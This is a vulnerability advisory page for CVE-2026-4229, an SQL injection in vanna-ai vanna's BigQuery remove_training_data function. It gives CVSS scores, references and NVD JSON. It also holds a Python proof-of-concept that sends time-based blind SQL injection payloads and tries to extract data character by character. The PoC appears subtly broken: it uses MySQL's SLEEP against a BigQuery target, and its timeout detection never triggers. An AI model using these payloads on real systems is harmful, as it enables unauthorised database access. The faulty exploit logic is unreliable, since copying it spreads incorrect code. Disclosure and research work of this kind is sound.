CVE-2026-4229

Description

A flaw has been found in vanna-ai vanna up to 2.0.2. This impacts the function remove_training_data of the file src/vanna/legacy/google/bigquery_vector.py. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

vanna-ai vanna <= 2.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-4229 SQL Injection PoC for vanna-ai vanna
# Target: vanna-ai vanna <= 2.0.2
# Endpoint: remove_training_data function in bigquery_vector.py

TARGET_URL = "http://target-server/api/remove_training"

# Malicious payload for SQL injection
# Using time-based blind SQL injection technique
payload = {
    "id": "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1"
}

def exploit_sql_injection():
    """
    Exploit SQL injection in vanna-ai remove_training_data function
    This PoC demonstrates time-based blind SQL injection
    """
    try:
        print("[*] Sending malicious request...")
        print(f"[*] Target: {TARGET_URL}")
        print(f"[*] Payload: {payload}")
        
        response = requests.post(TARGET_URL, json=payload, timeout=10)
        
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text}")
        
        return response
    except requests.exceptions.Timeout:
        print("[+] SQL Injection confirmed! Request timed out as expected.")
        return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None

def extract_dataBlind(sql_query):
    """
    Extract data using time-based blind SQL injection
    Example: Extract database version
    """
    # Character-by-character extraction using binary search
    extracted = ""
    for pos in range(1, 50):
        low = 32
        high = 126
        while low <= high:
            mid = (low + high) // 2
            payload = {
                "id": f"1' AND (SELECT CASE WHEN (ASCII(SUBSTRING(({sql_query}),{pos},1))>{mid}) THEN SLEEP(2) ELSE 0 END) AND '1'='1"
            }
            try:
                response = requests.post(TARGET_URL, json=payload, timeout=5)
            except:
                pass
            # If timeout occurs, character is greater than mid
            # Adjust range accordingly
            if response is None:
                low = mid + 1
            else:
                high = mid - 1
        if high >= 32:
            extracted += chr(high)
            print(f"[*] Extracted so far: {extracted}")
    return extracted

if __name__ == "__main__":
    print("="*60)
    print("CVE-2026-4229 SQL Injection PoC")
    print("vanna-ai vanna <= 2.0.2")
    print("="*60)
    exploit_sql_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4229
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4229
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4229/
[4] VulDB https://vuldb.com/cve/CVE-2026-4229
[5] https://gist.github.com/YLChen-007/b4f326eaecc29b192cf93dc5d6bc0623
[6] https://vuldb.com/?ctiid.351152
[7] https://vuldb.com/?id.351152
[8] https://vuldb.com/?submit.771214

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4229", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:16.277", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in vanna-ai vanna up to 2.0.2. This impacts the function remove_training_data of the file src/vanna/legacy/google/bigquery_vector.py. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en vanna-ai vanna hasta la versión 2.0.2. Esto afecta a la función remove_training_data del archivo src/vanna/legacy/google/bigquery_vector.py. Esta manipulación del argumento ID causa inyección SQL. El ataque puede iniciarse de forma remota. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gist.github.com/YLChen-007/b4f326eaecc29b192cf93dc5d6bc0623", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351152", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351152", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771214", "source": "[email protected]"}]}}